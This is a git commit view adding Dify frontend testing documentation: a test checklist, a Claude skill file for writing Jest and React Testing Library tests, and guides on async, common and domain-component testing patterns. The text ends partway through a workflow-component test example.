Merge remote-tracking branch 'origin/main' into feat/e2e-testing

This commit is contained in:
CodingOnStar 2025-12-16 10:04:19 +08:00
commit 3863894072
323 changed files with 25713 additions and 3590 deletions

View File

@ -0,0 +1,205 @@
# Test Generation Checklist
Use this checklist when generating or reviewing tests for Dify frontend components.
## Pre-Generation
- [ ] Read the component source code completely
- [ ] Identify component type (component, hook, utility, page)
- [ ] Run `pnpm analyze-component <path>` if available
- [ ] Note complexity score and features detected
- [ ] Check for existing tests in the same directory
- [ ] **Identify ALL files in the directory** that need testing (not just index)
## Testing Strategy
### ⚠️ Incremental Workflow (CRITICAL for Multi-File)
- [ ] **NEVER generate all tests at once** - process one file at a time
- [ ] Order files by complexity: utilities → hooks → simple → complex → integration
- [ ] Create a todo list to track progress before starting
- [ ] For EACH file: write → run test → verify pass → then next
- [ ] **DO NOT proceed** to next file until current one passes
### Path-Level Coverage
- [ ] **Test ALL files** in the assigned directory/path
- [ ] List all components, hooks, utilities that need coverage
- [ ] Decide: single spec file (integration) or multiple spec files (unit)
### Complexity Assessment
- [ ] Run `pnpm analyze-component <path>` for complexity score
- [ ] **Complexity > 50**: Consider refactoring before testing
- [ ] **500+ lines**: Consider splitting before testing
- [ ] **30-50 complexity**: Use multiple describe blocks, organized structure
### Integration vs Mocking
- [ ] **DO NOT mock base components** (`Loading`, `Button`, `Tooltip`, etc.)
- [ ] Import real project components instead of mocking
- [ ] Only mock: API calls, complex context providers, third-party libs with side effects
- [ ] Prefer integration testing when using single spec file
## Required Test Sections
### All Components MUST Have
- [ ] **Rendering tests** - Component renders without crashing
- [ ] **Props tests** - Required props, optional props, default values
- [ ] **Edge cases** - null, undefined, empty values, boundaries
### Conditional Sections (Add When Feature Present)
| Feature | Add Tests For |
|---------|---------------|
| `useState` | Initial state, transitions, cleanup |
| `useEffect` | Execution, dependencies, cleanup |
| Event handlers | onClick, onChange, onSubmit, keyboard |
| API calls | Loading, success, error states |
| Routing | Navigation, params, query strings |
| `useCallback`/`useMemo` | Referential equality |
| Context | Provider values, consumer behavior |
| Forms | Validation, submission, error display |
## Code Quality Checklist
### Structure
- [ ] Uses `describe` blocks to group related tests
- [ ] Test names follow `should <behavior> when <condition>` pattern
- [ ] AAA pattern (Arrange-Act-Assert) is clear
- [ ] Comments explain complex test scenarios
### Mocks
- [ ] **DO NOT mock base components** (`@/app/components/base/*`)
- [ ] `jest.clearAllMocks()` in `beforeEach` (not `afterEach`)
- [ ] Shared mock state reset in `beforeEach`
- [ ] i18n mock returns keys (not empty strings)
- [ ] Router mocks match actual Next.js API
- [ ] Mocks reflect actual component conditional behavior
- [ ] Only mock: API services, complex context providers, third-party libs
### Queries
- [ ] Prefer semantic queries (`getByRole`, `getByLabelText`)
- [ ] Use `queryBy*` for absence assertions
- [ ] Use `findBy*` for async elements
- [ ] `getByTestId` only as last resort
### Async
- [ ] All async tests use `async/await`
- [ ] `waitFor` wraps async assertions
- [ ] Fake timers properly setup/teardown
- [ ] No floating promises
### TypeScript
- [ ] No `any` types without justification
- [ ] Mock data uses actual types from source
- [ ] Factory functions have proper return types
## Coverage Goals (Per File)
For the current file being tested:
- [ ] 100% function coverage
- [ ] 100% statement coverage
- [ ] >95% branch coverage
- [ ] >95% line coverage
## Post-Generation (Per File)
**Run these checks after EACH test file, not just at the end:**
- [ ] Run `pnpm test -- path/to/file.spec.tsx` - **MUST PASS before next file**
- [ ] Fix any failures immediately
- [ ] Mark file as complete in todo list
- [ ] Only then proceed to next file
### After All Files Complete
- [ ] Run full directory test: `pnpm test -- path/to/directory/`
- [ ] Check coverage report: `pnpm test -- --coverage`
- [ ] Run `pnpm lint:fix` on all test files
- [ ] Run `pnpm type-check:tsgo`
## Common Issues to Watch
### False Positives
```typescript
// ❌ Mock doesn't match actual behavior
jest.mock('./Component', () => () => <div>Mocked</div>)
// ✅ Mock matches actual conditional logic
jest.mock('./Component', () => ({ isOpen }: any) =>
isOpen ? <div>Content</div> : null
)
```
### State Leakage
```typescript
// ❌ Shared state not reset
let mockState = false
jest.mock('./useHook', () => () => mockState)
// ✅ Reset in beforeEach
beforeEach(() => {
mockState = false
})
```
### Async Race Conditions
```typescript
// ❌ Not awaited
it('loads data', () => {
render(<Component />)
expect(screen.getByText('Data')).toBeInTheDocument()
})
// ✅ Properly awaited
it('loads data', async () => {
render(<Component />)
await waitFor(() => {
expect(screen.getByText('Data')).toBeInTheDocument()
})
})
```
### Missing Edge Cases
Always test these scenarios:
- `null` / `undefined` inputs
- Empty strings / arrays / objects
- Boundary values (0, -1, MAX_INT)
- Error states
- Loading states
- Disabled states
## Quick Commands
```bash
# Run specific test
pnpm test -- path/to/file.spec.tsx
# Run with coverage
pnpm test -- --coverage path/to/file.spec.tsx
# Watch mode
pnpm test -- --watch path/to/file.spec.tsx
# Update snapshots (use sparingly)
pnpm test -- -u path/to/file.spec.tsx
# Analyze component
pnpm analyze-component path/to/component.tsx
# Review existing test
pnpm analyze-component path/to/component.tsx --review
```

View File

@ -0,0 +1,320 @@
---
name: Dify Frontend Testing
description: Generate Jest + React Testing Library tests for Dify frontend components, hooks, and utilities. Triggers on testing, spec files, coverage, Jest, RTL, unit tests, integration tests, or write/review test requests.
---
# Dify Frontend Testing Skill
This skill enables Claude to generate high-quality, comprehensive frontend tests for the Dify project following established conventions and best practices.
> **⚠️ Authoritative Source**: This skill is derived from `web/testing/testing.md`. When in doubt, always refer to that document as the canonical specification.
## When to Apply This Skill
Apply this skill when the user:
- Asks to **write tests** for a component, hook, or utility
- Asks to **review existing tests** for completeness
- Mentions **Jest**, **React Testing Library**, **RTL**, or **spec files**
- Requests **test coverage** improvement
- Uses `pnpm analyze-component` output as context
- Mentions **testing**, **unit tests**, or **integration tests** for frontend code
- Wants to understand **testing patterns** in the Dify codebase
**Do NOT apply** when:
- User is asking about backend/API tests (Python/pytest)
- User is asking about E2E tests (Playwright/Cypress)
- User is only asking conceptual questions without code context
## Quick Reference
### Tech Stack
| Tool | Version | Purpose |
|------|---------|---------|
| Jest | 29.7 | Test runner |
| React Testing Library | 16.0 | Component testing |
| happy-dom | - | Test environment |
| nock | 14.0 | HTTP mocking |
| TypeScript | 5.x | Type safety |
### Key Commands
```bash
# Run all tests
pnpm test
# Watch mode
pnpm test -- --watch
# Run specific file
pnpm test -- path/to/file.spec.tsx
# Generate coverage report
pnpm test -- --coverage
# Analyze component complexity
pnpm analyze-component <path>
# Review existing test
pnpm analyze-component <path> --review
```
### File Naming
- Test files: `ComponentName.spec.tsx` (same directory as component)
- Integration tests: `web/__tests__/` directory
## Test Structure Template
```typescript
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import Component from './index'
// ✅ Import real project components (DO NOT mock these)
// import Loading from '@/app/components/base/loading'
// import { ChildComponent } from './child-component'
// ✅ Mock external dependencies only
jest.mock('@/service/api')
jest.mock('next/navigation', () => ({
useRouter: () => ({ push: jest.fn() }),
usePathname: () => '/test',
}))
// Shared state for mocks (if needed)
let mockSharedState = false
describe('ComponentName', () => {
beforeEach(() => {
jest.clearAllMocks() // ✅ Reset mocks BEFORE each test
mockSharedState = false // ✅ Reset shared state
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should render without crashing', () => {
// Arrange
const props = { title: 'Test' }
// Act
render(<Component {...props} />)
// Assert
expect(screen.getByText('Test')).toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should apply custom className', () => {
render(<Component className="custom" />)
expect(screen.getByRole('button')).toHaveClass('custom')
})
})
// User Interactions
describe('User Interactions', () => {
it('should handle click events', () => {
const handleClick = jest.fn()
render(<Component onClick={handleClick} />)
fireEvent.click(screen.getByRole('button'))
expect(handleClick).toHaveBeenCalledTimes(1)
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle null data', () => {
render(<Component data={null} />)
expect(screen.getByText(/no data/i)).toBeInTheDocument()
})
it('should handle empty array', () => {
render(<Component items={[]} />)
expect(screen.getByText(/empty/i)).toBeInTheDocument()
})
})
})
```
## Testing Workflow (CRITICAL)
### ⚠️ Incremental Approach Required
**NEVER generate all test files at once.** For complex components or multi-file directories:
1. **Analyze & Plan**: List all files, order by complexity (simple → complex)
1. **Process ONE at a time**: Write test → Run test → Fix if needed → Next
1. **Verify before proceeding**: Do NOT continue to next file until current passes
```
For each file:
┌────────────────────────────────────────┐
│ 1. Write test │
│ 2. Run: pnpm test -- <file>.spec.tsx │
│ 3. PASS? → Mark complete, next file │
│ FAIL? → Fix first, then continue │
└────────────────────────────────────────┘
```
### Complexity-Based Order
Process in this order for multi-file testing:
1. 🟢 Utility functions (simplest)
1. 🟢 Custom hooks
1. 🟡 Simple components (presentational)
1. 🟡 Medium components (state, effects)
1. 🔴 Complex components (API, routing)
1. 🔴 Integration tests (index files - last)
### When to Refactor First
- **Complexity > 50**: Break into smaller pieces before testing
- **500+ lines**: Consider splitting before testing
- **Many dependencies**: Extract logic into hooks first
> 📖 See `guides/workflow.md` for complete workflow details and todo list format.
## Testing Strategy
### Path-Level Testing (Directory Testing)
When assigned to test a directory/path, test **ALL content** within that path:
- Test all components, hooks, utilities in the directory (not just `index` file)
- Use incremental approach: one file at a time, verify each before proceeding
- Goal: 100% coverage of ALL files in the directory
### Integration Testing First
**Prefer integration testing** when writing tests for a directory:
- ✅ **Import real project components** directly (including base components and siblings)
- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers
- ❌ **DO NOT mock** base components (`@/app/components/base/*`)
- ❌ **DO NOT mock** sibling/child components in the same directory
> See [Test Structure Template](#test-structure-template) for correct import/mock patterns.
## Core Principles
### 1. AAA Pattern (Arrange-Act-Assert)
Every test should clearly separate:
- **Arrange**: Setup test data and render component
- **Act**: Perform user actions
- **Assert**: Verify expected outcomes
### 2. Black-Box Testing
- Test observable behavior, not implementation details
- Use semantic queries (getByRole, getByLabelText)
- Avoid testing internal state directly
- **Prefer pattern matching over hardcoded strings** in assertions:
```typescript
// ❌ Avoid: hardcoded text assertions
expect(screen.getByText('Loading...')).toBeInTheDocument()
// ✅ Better: role-based queries
expect(screen.getByRole('status')).toBeInTheDocument()
// ✅ Better: pattern matching
expect(screen.getByText(/loading/i)).toBeInTheDocument()
```
### 3. Single Behavior Per Test
Each test verifies ONE user-observable behavior:
```typescript
// ✅ Good: One behavior
it('should disable button when loading', () => {
render(<Button loading />)
expect(screen.getByRole('button')).toBeDisabled()
})
// ❌ Bad: Multiple behaviors
it('should handle loading state', () => {
render(<Button loading />)
expect(screen.getByRole('button')).toBeDisabled()
expect(screen.getByText('Loading...')).toBeInTheDocument()
expect(screen.getByRole('button')).toHaveClass('loading')
})
```
### 4. Semantic Naming
Use `should <behavior> when <condition>`:
```typescript
it('should show error message when validation fails')
it('should call onSubmit when form is valid')
it('should disable input when isReadOnly is true')
```
## Required Test Scenarios
### Always Required (All Components)
1. **Rendering**: Component renders without crashing
1. **Props**: Required props, optional props, default values
1. **Edge Cases**: null, undefined, empty values, boundary conditions
### Conditional (When Present)
| Feature | Test Focus |
|---------|-----------|
| `useState` | Initial state, transitions, cleanup |
| `useEffect` | Execution, dependencies, cleanup |
| Event handlers | All onClick, onChange, onSubmit, keyboard |
| API calls | Loading, success, error states |
| Routing | Navigation, params, query strings |
| `useCallback`/`useMemo` | Referential equality |
| Context | Provider values, consumer behavior |
| Forms | Validation, submission, error display |
## Coverage Goals (Per File)
For each test file generated, aim for:
- ✅ **100%** function coverage
- ✅ **100%** statement coverage
- ✅ **>95%** branch coverage
- ✅ **>95%** line coverage
> **Note**: For multi-file directories, process one file at a time with full coverage each. See `guides/workflow.md`.
## Detailed Guides
For more detailed information, refer to:
- `guides/workflow.md` - **Incremental testing workflow** (MUST READ for multi-file testing)
- `guides/mocking.md` - Mock patterns and best practices
- `guides/async-testing.md` - Async operations and API calls
- `guides/domain-components.md` - Workflow, Dataset, Configuration testing
- `guides/common-patterns.md` - Frequently used testing patterns
## Authoritative References
### Primary Specification (MUST follow)
- **`web/testing/testing.md`** - The canonical testing specification. This skill is derived from this document.
### Reference Examples in Codebase
- `web/utils/classnames.spec.ts` - Utility function tests
- `web/app/components/base/button/index.spec.tsx` - Component tests
- `web/__mocks__/provider-context.ts` - Mock factory example
### Project Configuration
- `web/jest.config.ts` - Jest configuration
- `web/jest.setup.ts` - Test environment setup
- `web/testing/analyze-component.js` - Component analysis tool

View File

@ -0,0 +1,345 @@
# Async Testing Guide
## Core Async Patterns
### 1. waitFor - Wait for Condition
```typescript
import { render, screen, waitFor } from '@testing-library/react'
it('should load and display data', async () => {
render(<DataComponent />)
// Wait for element to appear
await waitFor(() => {
expect(screen.getByText('Loaded Data')).toBeInTheDocument()
})
})
it('should hide loading spinner after load', async () => {
render(<DataComponent />)
// Wait for element to disappear
await waitFor(() => {
expect(screen.queryByText('Loading...')).not.toBeInTheDocument()
})
})
```
### 2. findBy\* - Async Queries
```typescript
it('should show user name after fetch', async () => {
render(<UserProfile />)
// findBy returns a promise, auto-waits up to 1000ms
const userName = await screen.findByText('John Doe')
expect(userName).toBeInTheDocument()
// findByRole with options
const button = await screen.findByRole('button', { name: /submit/i })
expect(button).toBeEnabled()
})
```
### 3. userEvent for Async Interactions
```typescript
import userEvent from '@testing-library/user-event'
it('should submit form', async () => {
const user = userEvent.setup()
const onSubmit = jest.fn()
render(<Form onSubmit={onSubmit} />)
// userEvent methods are async
await user.type(screen.getByLabelText('Email'), 'test@example.com')
await user.click(screen.getByRole('button', { name: /submit/i }))
await waitFor(() => {
expect(onSubmit).toHaveBeenCalledWith({ email: 'test@example.com' })
})
})
```
## Fake Timers
### When to Use Fake Timers
- Testing components with `setTimeout`/`setInterval`
- Testing debounce/throttle behavior
- Testing animations or delayed transitions
- Testing polling or retry logic
### Basic Fake Timer Setup
```typescript
describe('Debounced Search', () => {
beforeEach(() => {
jest.useFakeTimers()
})
afterEach(() => {
jest.useRealTimers()
})
it('should debounce search input', async () => {
const onSearch = jest.fn()
render(<SearchInput onSearch={onSearch} debounceMs={300} />)
// Type in the input
fireEvent.change(screen.getByRole('textbox'), { target: { value: 'query' } })
// Search not called immediately
expect(onSearch).not.toHaveBeenCalled()
// Advance timers
jest.advanceTimersByTime(300)
// Now search is called
expect(onSearch).toHaveBeenCalledWith('query')
})
})
```
### Fake Timers with Async Code
```typescript
it('should retry on failure', async () => {
jest.useFakeTimers()
const fetchData = jest.fn()
.mockRejectedValueOnce(new Error('Network error'))
.mockResolvedValueOnce({ data: 'success' })
render(<RetryComponent fetchData={fetchData} retryDelayMs={1000} />)
// First call fails
await waitFor(() => {
expect(fetchData).toHaveBeenCalledTimes(1)
})
// Advance timer for retry
jest.advanceTimersByTime(1000)
// Second call succeeds
await waitFor(() => {
expect(fetchData).toHaveBeenCalledTimes(2)
expect(screen.getByText('success')).toBeInTheDocument()
})
jest.useRealTimers()
})
```
### Common Fake Timer Utilities
```typescript
// Run all pending timers
jest.runAllTimers()
// Run only pending timers (not new ones created during execution)
jest.runOnlyPendingTimers()
// Advance by specific time
jest.advanceTimersByTime(1000)
// Get current fake time
jest.now()
// Clear all timers
jest.clearAllTimers()
```
## API Testing Patterns
### Loading → Success → Error States
```typescript
describe('DataFetcher', () => {
beforeEach(() => {
jest.clearAllMocks()
})
it('should show loading state', () => {
mockedApi.fetchData.mockImplementation(() => new Promise(() => {})) // Never resolves
render(<DataFetcher />)
expect(screen.getByTestId('loading-spinner')).toBeInTheDocument()
})
it('should show data on success', async () => {
mockedApi.fetchData.mockResolvedValue({ items: ['Item 1', 'Item 2'] })
render(<DataFetcher />)
// Use findBy* for multiple async elements (better error messages than waitFor with multiple assertions)
const item1 = await screen.findByText('Item 1')
const item2 = await screen.findByText('Item 2')
expect(item1).toBeInTheDocument()
expect(item2).toBeInTheDocument()
expect(screen.queryByTestId('loading-spinner')).not.toBeInTheDocument()
})
it('should show error on failure', async () => {
mockedApi.fetchData.mockRejectedValue(new Error('Failed to fetch'))
render(<DataFetcher />)
await waitFor(() => {
expect(screen.getByText(/failed to fetch/i)).toBeInTheDocument()
})
})
it('should retry on error', async () => {
mockedApi.fetchData.mockRejectedValue(new Error('Network error'))
render(<DataFetcher />)
await waitFor(() => {
expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument()
})
mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] })
fireEvent.click(screen.getByRole('button', { name: /retry/i }))
await waitFor(() => {
expect(screen.getByText('Item 1')).toBeInTheDocument()
})
})
})
```
### Testing Mutations
```typescript
it('should submit form and show success', async () => {
const user = userEvent.setup()
mockedApi.createItem.mockResolvedValue({ id: '1', name: 'New Item' })
render(<CreateItemForm />)
await user.type(screen.getByLabelText('Name'), 'New Item')
await user.click(screen.getByRole('button', { name: /create/i }))
// Button should be disabled during submission
expect(screen.getByRole('button', { name: /creating/i })).toBeDisabled()
await waitFor(() => {
expect(screen.getByText(/created successfully/i)).toBeInTheDocument()
})
expect(mockedApi.createItem).toHaveBeenCalledWith({ name: 'New Item' })
})
```
## useEffect Testing
### Testing Effect Execution
```typescript
it('should fetch data on mount', async () => {
const fetchData = jest.fn().mockResolvedValue({ data: 'test' })
render(<ComponentWithEffect fetchData={fetchData} />)
await waitFor(() => {
expect(fetchData).toHaveBeenCalledTimes(1)
})
})
```
### Testing Effect Dependencies
```typescript
it('should refetch when id changes', async () => {
const fetchData = jest.fn().mockResolvedValue({ data: 'test' })
const { rerender } = render(<ComponentWithEffect id="1" fetchData={fetchData} />)
await waitFor(() => {
expect(fetchData).toHaveBeenCalledWith('1')
})
rerender(<ComponentWithEffect id="2" fetchData={fetchData} />)
await waitFor(() => {
expect(fetchData).toHaveBeenCalledWith('2')
expect(fetchData).toHaveBeenCalledTimes(2)
})
})
```
### Testing Effect Cleanup
```typescript
it('should cleanup subscription on unmount', () => {
const subscribe = jest.fn()
const unsubscribe = jest.fn()
subscribe.mockReturnValue(unsubscribe)
const { unmount } = render(<SubscriptionComponent subscribe={subscribe} />)
expect(subscribe).toHaveBeenCalledTimes(1)
unmount()
expect(unsubscribe).toHaveBeenCalledTimes(1)
})
```
## Common Async Pitfalls
### ❌ Don't: Forget to await
```typescript
// Bad - test may pass even if assertion fails
it('should load data', () => {
render(<Component />)
waitFor(() => {
expect(screen.getByText('Data')).toBeInTheDocument()
})
})
// Good - properly awaited
it('should load data', async () => {
render(<Component />)
await waitFor(() => {
expect(screen.getByText('Data')).toBeInTheDocument()
})
})
```
### ❌ Don't: Use multiple assertions in single waitFor
```typescript
// Bad - if first assertion fails, won't know about second
await waitFor(() => {
expect(screen.getByText('Title')).toBeInTheDocument()
expect(screen.getByText('Description')).toBeInTheDocument()
})
// Good - separate waitFor or use findBy
const title = await screen.findByText('Title')
const description = await screen.findByText('Description')
expect(title).toBeInTheDocument()
expect(description).toBeInTheDocument()
```
### ❌ Don't: Mix fake timers with real async
```typescript
// Bad - fake timers don't work well with real Promises
jest.useFakeTimers()
await waitFor(() => {
expect(screen.getByText('Data')).toBeInTheDocument()
}) // May timeout!
// Good - use runAllTimers or advanceTimersByTime
jest.useFakeTimers()
render(<Component />)
jest.runAllTimers()
expect(screen.getByText('Data')).toBeInTheDocument()
```

View File

@ -0,0 +1,449 @@
# Common Testing Patterns
## Query Priority
Use queries in this order (most to least preferred):
```typescript
// 1. getByRole - Most recommended (accessibility)
screen.getByRole('button', { name: /submit/i })
screen.getByRole('textbox', { name: /email/i })
screen.getByRole('heading', { level: 1 })
// 2. getByLabelText - Form fields
screen.getByLabelText('Email address')
screen.getByLabelText(/password/i)
// 3. getByPlaceholderText - When no label
screen.getByPlaceholderText('Search...')
// 4. getByText - Non-interactive elements
screen.getByText('Welcome to Dify')
screen.getByText(/loading/i)
// 5. getByDisplayValue - Current input value
screen.getByDisplayValue('current value')
// 6. getByAltText - Images
screen.getByAltText('Company logo')
// 7. getByTitle - Tooltip elements
screen.getByTitle('Close')
// 8. getByTestId - Last resort only!
screen.getByTestId('custom-element')
```
## Event Handling Patterns
### Click Events
```typescript
// Basic click
fireEvent.click(screen.getByRole('button'))
// With userEvent (preferred for realistic interaction)
const user = userEvent.setup()
await user.click(screen.getByRole('button'))
// Double click
await user.dblClick(screen.getByRole('button'))
// Right click
await user.pointer({ keys: '[MouseRight]', target: screen.getByRole('button') })
```
### Form Input
```typescript
const user = userEvent.setup()
// Type in input
await user.type(screen.getByRole('textbox'), 'Hello World')
// Clear and type
await user.clear(screen.getByRole('textbox'))
await user.type(screen.getByRole('textbox'), 'New value')
// Select option
await user.selectOptions(screen.getByRole('combobox'), 'option-value')
// Check checkbox
await user.click(screen.getByRole('checkbox'))
// Upload file
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
await user.upload(screen.getByLabelText(/upload/i), file)
```
### Keyboard Events
```typescript
const user = userEvent.setup()
// Press Enter
await user.keyboard('{Enter}')
// Press Escape
await user.keyboard('{Escape}')
// Keyboard shortcut
await user.keyboard('{Control>}a{/Control}') // Ctrl+A
// Tab navigation
await user.tab()
// Arrow keys
await user.keyboard('{ArrowDown}')
await user.keyboard('{ArrowUp}')
```
## Component State Testing
### Testing State Transitions
```typescript
describe('Counter', () => {
it('should increment count', async () => {
const user = userEvent.setup()
render(<Counter initialCount={0} />)
// Initial state
expect(screen.getByText('Count: 0')).toBeInTheDocument()
// Trigger transition
await user.click(screen.getByRole('button', { name: /increment/i }))
// New state
expect(screen.getByText('Count: 1')).toBeInTheDocument()
})
})
```
### Testing Controlled Components
```typescript
describe('ControlledInput', () => {
it('should call onChange with new value', async () => {
const user = userEvent.setup()
const handleChange = jest.fn()
render(<ControlledInput value="" onChange={handleChange} />)
await user.type(screen.getByRole('textbox'), 'a')
expect(handleChange).toHaveBeenCalledWith('a')
})
it('should display controlled value', () => {
render(<ControlledInput value="controlled" onChange={jest.fn()} />)
expect(screen.getByRole('textbox')).toHaveValue('controlled')
})
})
```
## Conditional Rendering Testing
```typescript
describe('ConditionalComponent', () => {
it('should show loading state', () => {
render(<DataDisplay isLoading={true} data={null} />)
expect(screen.getByText(/loading/i)).toBeInTheDocument()
expect(screen.queryByTestId('data-content')).not.toBeInTheDocument()
})
it('should show error state', () => {
render(<DataDisplay isLoading={false} data={null} error="Failed to load" />)
expect(screen.getByText(/failed to load/i)).toBeInTheDocument()
})
it('should show data when loaded', () => {
render(<DataDisplay isLoading={false} data={{ name: 'Test' }} />)
expect(screen.getByText('Test')).toBeInTheDocument()
})
it('should show empty state when no data', () => {
render(<DataDisplay isLoading={false} data={[]} />)
expect(screen.getByText(/no data/i)).toBeInTheDocument()
})
})
```
## List Rendering Testing
```typescript
describe('ItemList', () => {
const items = [
{ id: '1', name: 'Item 1' },
{ id: '2', name: 'Item 2' },
{ id: '3', name: 'Item 3' },
]
it('should render all items', () => {
render(<ItemList items={items} />)
expect(screen.getAllByRole('listitem')).toHaveLength(3)
items.forEach(item => {
expect(screen.getByText(item.name)).toBeInTheDocument()
})
})
it('should handle item selection', async () => {
const user = userEvent.setup()
const onSelect = jest.fn()
render(<ItemList items={items} onSelect={onSelect} />)
await user.click(screen.getByText('Item 2'))
expect(onSelect).toHaveBeenCalledWith(items[1])
})
it('should handle empty list', () => {
render(<ItemList items={[]} />)
expect(screen.getByText(/no items/i)).toBeInTheDocument()
})
})
```
## Modal/Dialog Testing
```typescript
describe('Modal', () => {
it('should not render when closed', () => {
render(<Modal isOpen={false} onClose={jest.fn()} />)
expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
})
it('should render when open', () => {
render(<Modal isOpen={true} onClose={jest.fn()} />)
expect(screen.getByRole('dialog')).toBeInTheDocument()
})
it('should call onClose when clicking overlay', async () => {
const user = userEvent.setup()
const handleClose = jest.fn()
render(<Modal isOpen={true} onClose={handleClose} />)
await user.click(screen.getByTestId('modal-overlay'))
expect(handleClose).toHaveBeenCalled()
})
it('should call onClose when pressing Escape', async () => {
const user = userEvent.setup()
const handleClose = jest.fn()
render(<Modal isOpen={true} onClose={handleClose} />)
await user.keyboard('{Escape}')
expect(handleClose).toHaveBeenCalled()
})
it('should trap focus inside modal', async () => {
const user = userEvent.setup()
render(
<Modal isOpen={true} onClose={jest.fn()}>
<button>First</button>
<button>Second</button>
</Modal>
)
// Focus should cycle within modal
await user.tab()
expect(screen.getByText('First')).toHaveFocus()
await user.tab()
expect(screen.getByText('Second')).toHaveFocus()
await user.tab()
expect(screen.getByText('First')).toHaveFocus() // Cycles back
})
})
```
## Form Testing
```typescript
describe('LoginForm', () => {
it('should submit valid form', async () => {
const user = userEvent.setup()
const onSubmit = jest.fn()
render(<LoginForm onSubmit={onSubmit} />)
await user.type(screen.getByLabelText(/email/i), 'test@example.com')
await user.type(screen.getByLabelText(/password/i), 'password123')
await user.click(screen.getByRole('button', { name: /sign in/i }))
expect(onSubmit).toHaveBeenCalledWith({
email: 'test@example.com',
password: 'password123',
})
})
it('should show validation errors', async () => {
const user = userEvent.setup()
render(<LoginForm onSubmit={jest.fn()} />)
// Submit empty form
await user.click(screen.getByRole('button', { name: /sign in/i }))
expect(screen.getByText(/email is required/i)).toBeInTheDocument()
expect(screen.getByText(/password is required/i)).toBeInTheDocument()
})
it('should validate email format', async () => {
const user = userEvent.setup()
render(<LoginForm onSubmit={jest.fn()} />)
await user.type(screen.getByLabelText(/email/i), 'invalid-email')
await user.click(screen.getByRole('button', { name: /sign in/i }))
expect(screen.getByText(/invalid email/i)).toBeInTheDocument()
})
it('should disable submit button while submitting', async () => {
const user = userEvent.setup()
const onSubmit = jest.fn(() => new Promise(resolve => setTimeout(resolve, 100)))
render(<LoginForm onSubmit={onSubmit} />)
await user.type(screen.getByLabelText(/email/i), 'test@example.com')
await user.type(screen.getByLabelText(/password/i), 'password123')
await user.click(screen.getByRole('button', { name: /sign in/i }))
expect(screen.getByRole('button', { name: /signing in/i })).toBeDisabled()
await waitFor(() => {
expect(screen.getByRole('button', { name: /sign in/i })).toBeEnabled()
})
})
})
```
## Data-Driven Tests with test.each
```typescript
describe('StatusBadge', () => {
test.each([
['success', 'bg-green-500'],
['warning', 'bg-yellow-500'],
['error', 'bg-red-500'],
['info', 'bg-blue-500'],
])('should apply correct class for %s status', (status, expectedClass) => {
render(<StatusBadge status={status} />)
expect(screen.getByTestId('status-badge')).toHaveClass(expectedClass)
})
test.each([
{ input: null, expected: 'Unknown' },
{ input: undefined, expected: 'Unknown' },
{ input: '', expected: 'Unknown' },
{ input: 'invalid', expected: 'Unknown' },
])('should show "Unknown" for invalid input: $input', ({ input, expected }) => {
render(<StatusBadge status={input} />)
expect(screen.getByText(expected)).toBeInTheDocument()
})
})
```
## Debugging Tips
```typescript
// Print entire DOM
screen.debug()
// Print specific element
screen.debug(screen.getByRole('button'))
// Log testing playground URL
screen.logTestingPlaygroundURL()
// Pretty print DOM
import { prettyDOM } from '@testing-library/react'
console.log(prettyDOM(screen.getByRole('dialog')))
// Check available roles
import { getRoles } from '@testing-library/react'
console.log(getRoles(container))
```
## Common Mistakes to Avoid
### ❌ Don't Use Implementation Details
```typescript
// Bad - testing implementation
expect(component.state.isOpen).toBe(true)
expect(wrapper.find('.internal-class').length).toBe(1)
// Good - testing behavior
expect(screen.getByRole('dialog')).toBeInTheDocument()
```
### ❌ Don't Forget Cleanup
```typescript
// Bad - may leak state between tests
it('test 1', () => {
render(<Component />)
})
// Good - cleanup is automatic with RTL, but reset mocks
beforeEach(() => {
jest.clearAllMocks()
})
```
### ❌ Don't Use Exact String Matching (Prefer Black-Box Assertions)
```typescript
// ❌ Bad - hardcoded strings are brittle
expect(screen.getByText('Submit Form')).toBeInTheDocument()
expect(screen.getByText('Loading...')).toBeInTheDocument()
// ✅ Good - role-based queries (most semantic)
expect(screen.getByRole('button', { name: /submit/i })).toBeInTheDocument()
expect(screen.getByRole('status')).toBeInTheDocument()
// ✅ Good - pattern matching (flexible)
expect(screen.getByText(/submit/i)).toBeInTheDocument()
expect(screen.getByText(/loading/i)).toBeInTheDocument()
// ✅ Good - test behavior, not exact UI text
expect(screen.getByRole('button')).toBeDisabled()
expect(screen.getByRole('alert')).toBeInTheDocument()
```
**Why prefer black-box assertions?**
- Text content may change (i18n, copy updates)
- Role-based queries test accessibility
- Pattern matching is resilient to minor changes
- Tests focus on behavior, not implementation details
### ❌ Don't Assert on Absence Without Query
```typescript
// Bad - throws if not found
expect(screen.getByText('Error')).not.toBeInTheDocument() // Error!
// Good - use queryBy for absence assertions
expect(screen.queryByText('Error')).not.toBeInTheDocument()
```

View File

@ -0,0 +1,523 @@
# Domain-Specific Component Testing
This guide covers testing patterns for Dify's domain-specific components.
## Workflow Components (`workflow/`)
Workflow components handle node configuration, data flow, and graph operations.
### Key Test Areas
1. **Node Configuration**
1. **Data Validation**
1. **Variable Passing**
1. **Edge Connections**
1. **Error Handling**
### Example: Node Configuration Panel
```typescript
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import NodeConfigPanel from './node-config-panel'
import { createMockNode, createMockWorkflowContext } from '@/__mocks__/workflow'
// Mock workflow context
jest.mock('@/app/components/workflow/hooks', () => ({
useWorkflowStore: () => mockWorkflowStore,
useNodesInteractions: () => mockNodesInteractions,
}))
let mockWorkflowStore = {
nodes: [],
edges: [],
updateNode: jest.fn(),
}
let mockNodesInteractions = {
handleNodeSelect: jest.fn(),
handleNodeDelete: jest.fn(),
}
describe('NodeConfigPanel', () => {
beforeEach(() => {
jest.clearAllMocks()
mockWorkflowStore = {
nodes: [],
edges: [],
updateNode: jest.fn(),
}
})
describe('Node Configuration', () => {
it('should render node type selector', () => {
const node = createMockNode({ type: 'llm' })
render(<NodeConfigPanel node={node} />)
expect(screen.getByLabelText(/model/i)).toBeInTheDocument()
})
it('should update node config on change', async () => {
const user = userEvent.setup()
